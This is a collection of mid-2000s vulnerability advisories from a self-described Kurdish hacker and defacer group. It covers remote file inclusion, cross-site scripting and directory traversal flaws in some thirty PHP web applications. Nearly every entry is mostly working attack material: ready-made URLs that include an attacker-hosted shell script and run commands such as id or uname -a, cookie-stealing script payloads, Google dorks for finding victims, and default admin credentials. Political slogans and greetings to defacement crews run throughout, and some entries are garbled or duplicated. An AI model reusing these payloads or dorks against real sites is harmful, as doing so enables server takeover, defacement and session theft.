[Kurdish Security # 27] Artmedic Links Script Remote File Include Vulnerability
- * Kurdish Security Advisory * Author : Botan * Script : Artmedic Links * Site : http://www.artmedic.de * Version : 5.0 * Risk : High * Class : Remote * Contact : [EMAIL PROTECTED] and irc.gigachat.net #kurdhack * Nice crackerz sh00tz:milex,b3g0k,azad,fearless,darki,qawiste,RedSt0rm,zagros and other my friend Original Advisory : http://kurdishsecurity.blogspot.com/2006/09/kurdish-security-27-artmedic-links.html - g00gle workz : artmedic links 5.0 index.php : ?PHP if(!isset($id)) [EMAIL PROTECTED](index1.htm);} if($id==search.php or $id==addlink.php) {include($id);} else [EMAIL PROTECTED]($id);} - http://www.site.com/[scriptpath]/index.php?id=y0urscripts.txt?cmd=id -
[Kurdish Security # 25 ] GrapAgenda Remote Command Vulnerability
* Kurdish Security Advisory * Original Advisory : http://kurdishsecurity.blogspot.com/2006/09/kurdish-security-25-grapagenda-remote.html * Script : GrapAgenda * Site : http://www.graphiks.net * Version : 0.1 * Risk : High * Class : Remote * Contact : [EMAIL PROTECTED] and irc.gigachat.net #kurdhack * Nice crackerz sh00tz:milex,b3g0k,azad,fearless,darki,qawiste and team : ColdHackers, Patriotic Hackers, Kurdish Hackers Clan [back ? auyehuah maybe] other teamz - Google w0rkez :P : GrapAgenda lol now code :] if($page!=){ include($page); }else{ include(accueil.php); } ? huh :] nice code, PoC http://www.site.com/[agendapath]/index.php?page=yourcode.txt?cmd=id
[Kurdish Security # 26 ] AnnonceV News Script Remote Command Vulnerability
* Kurdish Security Advisory * Original Adv : http://kurdishsecurity.blogspot.com/2006/09/kurdish-security-26-annoncev-news.html * Script : AnnonceV * Site : http://www.comscripts.com/scripts/php.annoncesv.1895.html * Version : 1.1 * Risk : High * Class : Remote * Contact : [EMAIL PROTECTED] and irc.gigachat.net #kurdhack * Nice crackerz sh00tz:milex,b3g0k,azad,fearless,darki,qawiste and other my friends --- Google w0rkez :P : AnnonceV1.1 : /admin/annonce.php : /annonce.php lol now code :] $page=$_GET['page']; if(substr($page, -3) == 'txt')//pour les news { include(newsdisplay.php); } else //pour toutes les autres pages { include($page..php); } ? http://www.site.com/annonce.php?page=yourcode.txt?cmd=id http://www.site.com/admin/annonce.php?page=yourcode.txt?cmd=id
[Kurdish Security # 23] Spaw Editor Remote Include Vulnerability
* Kurdish Security Advisory * Spaw Editor Remote Include Vulnerability * Our Party is PKK, Our Army HPG, We will Earn * contact ? : irc.gigachat.net #kurdhack [EMAIL PROTECTED] * Risk : High * Class : Remote * Script : Spaw Editor * Version : v1.6 and v1.7 * Site : www.solmetra.com ? // include wysiwyg config include '../config/spaw_control.config.php'; include $spaw_root.'class/lang.class.php'; $theme = empty($HTTP_GET_VARS['theme'])?$spaw_default_theme:$HTTP_GET_VARS['theme']; $theme_path = $spaw_dir.'lib/themes/'.$theme.'/'; $l = new SPAW_Lang($HTTP_GET_VARS['lang']); $l-setBlock('colorpicker'); ? http://site.com/[path]/dialogs/a.php?spaw_dir=http://www.shell.txt?cmd=id http://site.com/[path]/dialogs/collorpicker.phpspaw_dir=http://www.shell.txtcmd=id http://site.com/[path]/dialogs/img.php?spaw_dir=http://www.shell.txt?cmd=id http://site.com/[path]/dialogs/img_library.php?spaw_dir=http://www.shell.txt?cmd=id http://site.com/[path]/dialogs/table.php?spaw_dir=http://www.shell.txt?cmd=id http://site.com/[path]/dialogs/td.php?spaw_dir=http://www.shell.txt?cmd=id Speacial MSG! : The Turk state is the aggressor behavior Don't stay quite. Hear the Kurdish people is scream be late.. Stop the Turkey Military!
[Kurdish Security # 16 ] newsReporter v1.0 Remote Command Execution
Kurdish Security newsReporter v1.0 Remote Command Execution Freedom For Ocalan Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com Rish : High Class : Remote Script : newsReporter Site : http://www.knusperleicht.at Code : require ($news_include_path=.inc/config.inc.php); require ($news_include_path=.inc/engine.inc.php); http://www.site.com/[scriptpath]/index.php?news_include_path= Eof.
[Kurdish Security # 17 ] GuestBook 3.5 Remote Command Execution
Kurdish Security Guestbook v3.5 Remote Command Execution Freedom For Ocalan Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com Rish : High Class : Remote Script : MoSpray Site : http://www.knusperleicht.at Code : define('FILE_POSTS',GB_PATH.db/posts.dat); define('FILE_SMILIE',GB_PATH.db/smilie.dat); $GB_INCLUDE[Img] = GB_PATH; $gb_failure = true; $gb_del = true; include(GB_PATH.admin/engine.inc.php); include(GB_PATH.db/settings.dat); http://www.site.com/[scriptpath]/index.php?GB_PATH=evilcode.txt?cmd=id Eof.
[Kurdish Security # 18 ] FAQ Script Remote Command Execution
Kurdish Security FAQ Script v1.0 Remote Command Execution Freedom For Ocalan Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com Rish : High Class : Remote Script : FAQ Script Site : http://www.knusperleicht.at Code : //if the script is includet you have to set this path else the path must be $faq_path = ; $faq_path = ; http://www.site.com/[path]/index.php?faq_path=evilcode.txt?cmd=id
[Kurdish Security # 19 ] FileManager Remote Command Execution
Kurdish Security FileManager Remote Command Execution Freedom For Ocalan Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com Rish : High Class : Remote Script : FileManager Site : http://www.knusperleicht.at Code : $dwl_download_path = downloads; $dwl_include_path = dwl/; include($dwl_include_path.index.php); ? http://site.com/[path]/dwl_download_path=evilcode.txt?cmd=id http://site.com/[path]/dwl_include_path=evilcode.txt?cmd=id
[Kurdish Security # 20 ] Quickie Remote Command Execution
Kurdish Security Quickie Remote Command Execution Freedom For Ocalan Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com Rish : High Class : Remote Script : Kurdish Security FileManager Remote Command Execution Freedom For Ocalan Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com Rish : High Class : Remote Script : Quickie Site : http://www.knusperleicht.at Code : #-- INCLUDE PATH -- #Beispiel: #Pfad von der Hauptseite in der wir den quickie includen wollen : #http://www.url.at/index.php , in index.php wird diese Code hinzugefügt : include(quickie/quickie.php); #Quickie liegt in dem Ordner: http://www.url.at/quickie/quickie.php # Also lautet der Pfad :: define('SB_PATH',quickie/); define('QUICK_PATH',); # Pfad des Quickies #-- INCLUDE PATH -- http://site.com/[path]/quickie.php?QUICK_PATH=evilcode.txt?cmd=id
[Kurdish Security # 21] ShoutBox v4.4 Remote Command Execution
Kurdish Security ShoutBox Remote Command Execution Freedom For Ocalan Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com Rish : High Class : Remote Script : ShoutBox Site : http://www.knusperleicht.at Code : //** // INCLUDE PATH define('SB_INCLUDE_PATH', $sb_include_path); // INCLUDE PATH //** include SB_INCLUDE_PATH.'inc/config.inc.php'; require_once SB_INCLUDE_PATH.'lang/'.SB_LANGUAGE.'/'.SB_LANGUAGE.'.lang.inc.php'; require_once SB_INCLUDE_PATH.'inc/Sb_template.php'; require_once SB_INCLUDE_PATH.'inc/Sb_bbcode.php'; require_once SB_INCLUDE_PATH.'inc/Sb_stuff.php'; require_once SB_INCLUDE_PATH.'inc/Sb_database.php'; if(SB_INCLUDE_PATH == ) { http://www.site.com/[path]/index.php?SB_INCLUDE_PATH=evilcode.txt?cmd=id
[Kurdish Security # 14] MoSpray [base_dir] Remote Command Execution [ Mambo Joomla]
Kurdish Security MoSpray Remote File Include Vulnerability Original Advisory : http://kurdishsecurity.blogspot.com/2006/07/kurdish-security-14-mospray-basedir.html Freedom For Ocalan Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com Rish : High Class : Remote Script : MoSpray Site : http://www.caneblu.com Thanx : kurdishsniper,netqurd,flot,azad,darki,B3g0k,jubni,milex,fearless,kha,kca and other my friends codes require($basedir/components/com_mospray/lang/$lang/admin.php); d0rkiz : allinurl:com_mospray http://www.site.com/components/com_mospray/scripts/admin.php?basedir=yourcode.txt?cmd=id Used link :] admin.php details.php modify.php newgroup.php newtask.php rss.php e0f
[Kurdish Security # 11] SiteBar Cross-Site Scripting
Kurdish Security Advisory irc.gigachat.net #kurdhack Viva Kurdistan! SiteBar Script Cross-Site Scripting Attack Site : http://brablc.com/ Version : All Version Proof of Concept : http://www.site.com/sitebar/command.php?command=[CODES] Original Advisory : http://kurdishsecurity.blogspot.com/2006/06/kurdish-security-11-sitebar-cross-site.html
[Kurdish Security # 10 ] MF Piadas 1.0 Remote File Include Vulnerability
# # Kurdish Security Advisory # MF Piadas 1.0 Remote File Include Vulnerability # Ey Tarih ya sana basarilar atfedecegiz ya da seni yasanmamis sayacagiz . Abdullah Ocalan # STOP THE MASSACRE IN THE TURKEY! FREEDOM FOR KURDISTAN ! # Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com [EMAIL PROTECTED] # Risk : High # Class : Remote # Script : MF Piadas # Script Website :http://www.mastersfusion.com.br # Version : 1.0 # Thanx : Netqurd,Milex,Flot,Azad,Darki,Jubni,PH,KHA,KCA and other my friends #Original Advisory : http://kurdishsecurity.blogspot.com/2006/06/kurdish-security-10-mf-piadas-10.html # This is script to be found remote file execution bug. At first this is script is necessary to become competent. Hacker the passing can do scripts. For this reason this scripts is by published did same the passwords. Passwords in generally ; username : admin password : admin if you enter in a shape successfull the system. You can make run code of far away. Proof Of Concept : http://www.site.com/[scriptpath]/admin/admin.php?page=yourcode.txt?cmd=id And Cross-Site Scripting Attack http://www.site.com/[scriptpath]/admin/admin.php?page=[code] EoF #
[Kurdish Security # 9] MyMail Directory Traversal And XSS Attacking Vulnerability
# Kurdish Security Advisory # irc.gigachat.net #kurdhack # Discovered by Botan # http://scripts.codingclick.com/MyMail/ http://kurdishsecurity.blogspot.com/2006/06/kurdish-security-9-mymail-directory.html CodingClick.com MyMail Script is useing for scripts.The passing can do between directory. Examine.. Now only first Directory Traversal vuln Vulnerable Version = 0.x http://www.site.com/[MyMail_path]/admin/ http://www.site.com/[MyMail_path]/admin/list.php?action=add http://www.site.com/[MyMail_path]/admin/email.php?action=add or /delete http://www.site.com/[MyMail_path]/admin/export.php http://www.site.com/[MyMail_path]/admin/archive.php?Action=add or /delete Now XSS attacking looking Vulnerable Version = 1.0 Beta http://www.site.com/[MyMail_path]/admin/login.php=error=[XSS]
[Kurdish Security # 8] DCP-Portal Remote File Include Vulnerability [Editor DHTML]
# Kurdish Security Advisory # irc.gigachat.net #kurdhack # http://www.milw0rm.com/exploits/1905 # Editor DHTML Scripting bugz $url_path_editor = $root_url/library/editor/; $abs_path_editor = $root/library/editor/; ? Proof Of Concept http://www.site.com/[dcpath]/library/editor/editor.php?root=http://www.yourscripts.com/x.txt?cmd=id
Re: OaBoard 1.0 Remote File inclusion
http://evuln.com/vulns/3/exploit.html look :] -- ___ Check out the latest SMS services @ http://www.linuxmail.org This allows you to send and receive SMS through your mailbox. Powered by Outblaze
[Kurdish Security # 7] Foing Remote File Include Vulnerability [PHPBB]
# Kurdish Security Advisory # Original Advisory : http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-remote-file.html # Foing Remote File Include Vulnerability [PHPBB] :} # Ey Tarih ya sana basarilar atfedecegiz ya da seni yasanmamis sayacagiz . Abdullah Ocalan # STOP THE MASSACRE IN THE TURKEY! FREEDOM FOR KURDISTAN ! # Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com [EMAIL PROTECTED] # Risk : High # Class : Remote # Script : Foing # Script Website : http://foing.sourceforge.net/ # Version : Foing 0.7.0 0.6.0 0.5.0 0.4.0 0.3.0 0.2.0 # w0rkz : Powered by foing 0.7.0 © 2003, 2004 Foing Group Powered by foing 0.6.0 © 2003, 2004 Foing Group etc.. # Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, Azad, ColdHackers, Kurdistan Cyber Army etc.. # Special Bitch : Turkish LameRz :] # cmd shell example: # cmd shell variable: ($_GET[cmd]); Vulnerable code : Get along at directory config.php did you meet of .. ?php define('FOING_INSTALLED', true); $phpbb_root_path = '../'; $foing_prefix = $table_prefix; ? Proof Of Concept : http://www.r0xed.com/[foingpath]/index.php?phpbb_root_path=http://evilcode.txt?cmd=uname -a http://www.r0xed.com/[foingpath]/song.php?phpbb_root_path=http://evilcode.txt?cmd=uname -a http://www.r0xed.com/[foingpath]/faq.php?phpbb_root_path=http://evilcode.txt?cmd=uname -a http://www.r0xed.com/[foingpath]/list.php?phpbb_root_path=http://evilcode.txt?cmd=uname -a http://www.r0xed.com/[foingpath]/gen_m3u.php?phpbb_root_path=http://evilcode.txt?cmd=uname -a http://www.r0xed.com/[foingpath]/playlist.php?phpbb_root_path=http://evilcode.txt?cmd=uname -a
[Kurdish Security # 4] phpRaid Remote File Include Vulnerability (PHPBB)
# Kurdish Security Advisory # phpRaid Remote File Include [PHPBB] :} # Sosyalizim'de #305;srar insan olmakta #305;srard#305;r Abdullah Ocalan # Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com [EMAIL PROTECTED] # Script : phpRaid # Script Website : http://www.spiffyjr.com/ # Version : phpRaid v2.9.5 v3.0.b1 v3.0.b2 v3.0.b3 # Risk : High # Class : Remote # Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, And Kurdish Hackers and Security Guards :D # Special Bastard : Turkish Lame # w0rkz : phpRaid inurl:phpRaid etc. :) - # cmd shell example: # cmd shell variable: ($_GET[cmd]); Vulnerable code : At first for phpbb portal :) } ? // define our auth type define(AUTH,phpbb); // database connection global $user_group_table; $user_group_table = $phpbb_prefix . user_group; // setup phpBB user integration define('IN_PHPBB', true); // set this as the path to your phpBB installation include($phpbb_root_path . 'extension.inc'); include($phpbb_root_path . 'common.'.$phpEx); - http://www.site.com/[phpraidpath]/auth/auth.php?phpbb_root_path=http://www.yourcode.com/x.txt?cmd=id http://www.site.com/[phpraidpath]/auth/auth_phpbb/phpbb_root_path=http://www.yourcode.com/x.txt?cmd=uname -a
[Kurdish Security # 5] phpRaid Remote File Include [SMF]
# Kurdish Security Advisory # phpRaid Remote File Include [SMF] :} # Sosyalizim'de #305;srar insan olmakta #305;srard#305;r Abdullah Ocalan # Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com [EMAIL PROTECTED] # Risk : High # Class : Remote # Script : phpRaid # Script Website : http://www.spiffyjr.com # Version : phpRaid v2.9.5 v3.0.b1 v3.0.b2 v3.0.b3 # Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, And Kurdish Hackers and Security Guards :D # Special Bastard : Turkish Lame # w0rkz : phpRaid inurl:phpRaid etc. :) - # cmd shell example: # cmd shell variable: ($_GET[cmd]); Vulnerable code : Now SMF portal code :) // includes include($smf_root_path= . 'SSI.php'); --- http://www.site.com/[phpraidpath]/auth/auth.php?smf_root_path=http://www.yourcode.com/x.txt?cmd=id http://www.site.com/[phpraidpath]/auth/auth_SMF/smf_root_path=http://www.yourcode.com/x.txt?cmd=uname -a
[Kurdish Security #3] CoolMenus Event Remote File Include Vulnerability (For PHP)
Original Advisory : http://kurdishsecurity.blogspot.com/2006/04/coolmenus-event-remote-file-include.html #ColMenus Event Remote File Include Vulnerability# #Website : http://coolmenus.dhtmlcentral.com/projects/coolmenus [Closed] #Script : CoolMenus v4.0 Event Script #Risk : High #Class : Remote #Greetz : B3g0k,Nistiman,Flot,Netqurd etc.. #d0rk : /event/index.php?page= I. require(event_inc.php); echo Events; $start = filectime($news); $jetzt = time(); $update = $start+$timespan; if($jetzt = $update) {include(event_html.php);} II. Proof of Concept: http://www.site.com/[path]/event/index.php?page=evilcode.txt?cmd=uname -a
[Kurdish Security #2] Artmedic Event Remote File Include Vulnerability
Original Advisory : http://kurdishsecurity.blogspot.com/2006/04/artmedic-event-remote-file-include.html #Artmedic Event Remote File Include Vulnerability #Website : http://www.artmedic.de/ #Script : Artmedic Event Script #Risk : High #Class : Remote #Greetz : B3g0k,Nistiman,Flot,Netqurd etc.. #d0rk : /event/index.php?page= Artmedic Web Desing Description [Deutch] artmedic event, author Ellen Baitinger, artmedic webdesign, http://www.artmedic.de Dieses Programm ist Freeware und darf kostenlos eingesetzt werden, solange der Link auf artmedic webdesign und die Hinweise der Autorenschaft unangetastet bleiben. I. if(!file_exists(artmedic_event_inc.php)) {include(setup.php); exit; } require(artmedic_event_inc.php); echo $eventtitle; $start = filectime($news); $jetzt = time(); $update = $start+$timespan; if($jetzt = $update) {include(artmedic_event_html.php);} - II. if(!$id and !$page) [EMAIL PROTECTED](artmedic_event1.htm);} if(!$id and $page) [EMAIL PROTECTED]($page);} if($id==1) {include(artmedic_event_inputform.htm);} if($id==2) {include(artmedic_event_add.php);} ? --- III. Proof of Concept: http://www.site.com/[path]/event/index.php?page=evilcode.txt?cmd=uname -a
EasyGallery Cross-Site Scripting
Website : www.wingnut.net.ms Author : Botan Credits : B3g0k,Nistiman,flot,Netqurd Original Advisory : http://advisory.patriotichackers.com/index.php?itemid=5 Description : EasyGallery is a simple web-photogallery with a maximum of user-friendlyness. All you have to do is to upload your photos and the EasyGallery files onto your webspace XSS code : http://www.site.com/[path]/EasyGallery.php?ordner=XSS
phpLister v. 0.4.1 XSS Attacking
Website : www.phplister.org Version : 0.4.1 Credits : B3g0k,Nistiman,Flot,Netqurd and other my friends Original Advisory : http://advisory.patriotichackers.com/index.php?itemid=3 XSS : http://www.site.com/[path]/index.php?page=XSS
Calendarix yearcal.php XSS Attacking
Website : http://www.calendarix.com Vulnerable : if (!isset($_GET['ycyear'])) $ycyear = $y ; else $ycyear = $_GET['ycyear']; http://www.site.com/[path]/yearcal.php?ycyear=scriptalert(document.cookie)/script
MyEvent Remote File Execution And XSS Attacking
Website : http://mywebland.com/ Script : MyEvent Version : 1.2 Risk : High Class : Remote Credits : b3g0k,Nistiman,flot,Netqurd etc.. my forget other friends Google look for :) = MyEvent 1.2 or /calendar/myevent.php I. Remote Code Execution This is script to very big high it bug being found. Event.php remote code execution : global $myevent_path; include_once $myevent_path.includes/template.php; $template = new Template($myevent_path.templates/) ; $template-set_filenames(array( 'event' = 'event.tpl', ? Did you see the myevent_path :) http://www.site.com/[path]/event.php?myevent_path=http://www.site.com/x.txt?cmd=uname -a #304;nitialize.php Remote Code : include $myevent_path.config.php; include $myevent_path.$language; include_once $myevent_path.includes/template.php ; $db = mysql_connect($host,$login,$password); mysql_select_db($base,$db); Yep now code http://www.site.com/[path]/initialize.php?myevent_path=http://www.site.com/x.txt?cmd=uname -a
phpFaber TopSites Script Cross-Site Scripting
Description : phpFaber TopSites is a feature-packed, reliable and secure Top List coded in PHP and mySQL. phpFaber TopSites has proven its reliability time and time again under the most active server environments. Our feature list is large, including all elements you need to easily maintain your list, and even make money of it. phpFaber TopSites can be integrated with all your favourite applications to save you the hassle of running two separate user systems. phpFaber TopSites includes what you expect from a Top List and much much more. It is fully customizable and doesn't require any programming skills! You can create your topsite just in 3 clicks! Vulnerable : http://www.example.com/index.php?page=scriptalert(document.cookie)/script
FleXiBle Development Script Remote Command Exucetion And XSS Attacking
Description : /* = File created by Andries Bruinsma (c) FleXiBle Development (FXB) Web: http://www.ahbruinsma.nl Email: [EMAIL PROTECTED] === File: main.php Version: 3.0 Date started: 10th May, 2004 Last modified : 24th January, 2006 Last Update: New layout = Vulnerable ob_start(ob_gzhandler); //Defining some functions and including them require('php/messages.php'); //require base-file //require_once('php/base.php'); include_once baseconfig.inc.php; http://www.site.com/[path]/evilcode.txt?cmd=uname -a
Warcraft III Replay Parser Script Remote Command Exucetion Vulnerability And Cross-Site Scripting Attacking
Website : http://toya.net.pl/~julas/w3g/ Version : 1.8c Description : Warcraft III Replay Parser for PHP? What is that? Maybe you know or maybe not that Warcraft III replay files (*.w3g) have much information inside. Almost everything can be pulled out of them: players accounts, races, colours, heroes and units made by each player, chat log and many more. If you are a webmaster of Warcraft III replay site or clan page you know how boring adding new replays can be without automation. This PHP script helps you provide as much information about replays on your site as possible without all the hard work. * I. Remote Command Exucetion .. Yolumuz agitlerin yoludur.! http://www.site.com/[path]/index.php?page=evilcode.txt?cmd=uname -a 2.XSS Attacking http://www.site.com/[path]/index.php?page=evilcode.txt?cmd=uname -a Solution : up version :) Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com 14'ler Ölümsüzdür.
CanfTool v1.1 Cross Site Scripting Attack
Cross Site Scripting Attack CanfTool v1.1 = Description : Conftool is a Web-based online system that was developed to supports many administrative tasks of conferences, workshops and seminars. It can help to make the management of events easier and much more efficient. ConfTool does not only support the submission/review-process, but also the registration of participants and many other tasks. Conftool is an open/shared-source system, technically mature and available under different licenses. We offer a free license of the standard version VSIS ConfTool for non-commercial conferences and events (i.e. only voluntary staff, less than 200 participants, student discounts). Please consider our license terms for non-commercial events. In addition to this, following products and services can be purchased: Per-conference and per-site licenses of VSIS ConfTool for organizers of small to medium size events. ConfTool Pro, an extensively enhanced version of ConfTool suitable for organization of larger events and offering much more features. Professional support for ConfTool and ConfTool Pro. Modifications of the software to the specific needs of your event. Hosting of ConfTool and ConfTool Pro. If you are interested in any of the above, please send a mail to [EMAIL PROTECTED] with some information about your event. * WebSite : http://www.conftool.net Vulnerable : http://www.example.com/[path]/index.php?page=scriptalert(document.cookie)/script Solution : No patch Avaible, please useing other version = Thanks : Patriotic Hackers members Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com
HeffnerCMS Remote Command Exucetion And Cross Scripting Attack
Website : http://www.christian-heffner.de Version : 1.07 I. ?php $filename=index.php; require_once 'vlib/vlibTemplate.php'; $tmpl = new vlibTemplate('tmpl/std/index.tpl'); require_once 'config/db_config.php'; require_once 'config/pcfunctions.php'; Ucuyor :) lol II. Vulnerable code ; http://www.site.com/index.php?page=evilcode.txt?cmd=uname -a III. Cross Scripting Attack http://www.site.com/index.php?page=scriptalert(document.cookie)/script http://www.site.com/index.php?page=scriptalert(Patriotic Hackers)/script Etc.. IV. Solution No Greetz ; B3g0k,Azad,Nistiman,Hawar,Seyh and other our friends.. irc.gigachat.net #kurdhack www.PatrioticHackers
CoreNews 2.0.1 Remote Command Exucetion
Webpage : www.coreslawn.de Risk : high Code : http://www.example.com/index.php?page=evilcode?cmd=id For Patriotic Hackers Freedom For Ocalan irc.gigachat.net #kurdhack
SMBlog Remote Command Exucetion
Offical webpage : http://superbounou.phpnet.org/smartblog/ Version : v1.2 http://www.site.com/[path]/index.php?evilcode?cmd=id http://www.site.com/?pg=evilcode?cmd=id Patriotic Hackers irc.gigachat.net #kurdhack Botan,B3g0k,Seyh,Nistiman
Knowledgebases Remote Command Exucetion
Web Site http://www.activecampaign.com/support/ Version : 1-2-All KB * KnowledgeBuilder KB * iSalient KB * SupportTrio KB * visualEdit KB * General KB This is a support-faq script. The questions is asked. But this a script high the risk at bug. Malicios person to reach far away. Vulnerable : http://www.site.com/[path]/index.php?page=http://evilcode?cmd= Patriotic Hackers http://www.patriotichack.org We Are Politic Kurdish Defacers! Botan,b3g0k,Azad,Nistiman,Seyh Special Thanks : All Kurdish Defacers
Tasarim Rehberi Index.PHP Remote Command Exucetion
Web Site : http://www.tasarimrehberi.com [Turkish Desing] Description : index.php remote attack Vulnerable ; http://www.site.com/index.php?sayfaadi=; and index.php?sayfa= Patriotic Hackers! Botan,B3g0k,Azad,Nistiman,Fesih :} Freedom For Ocalan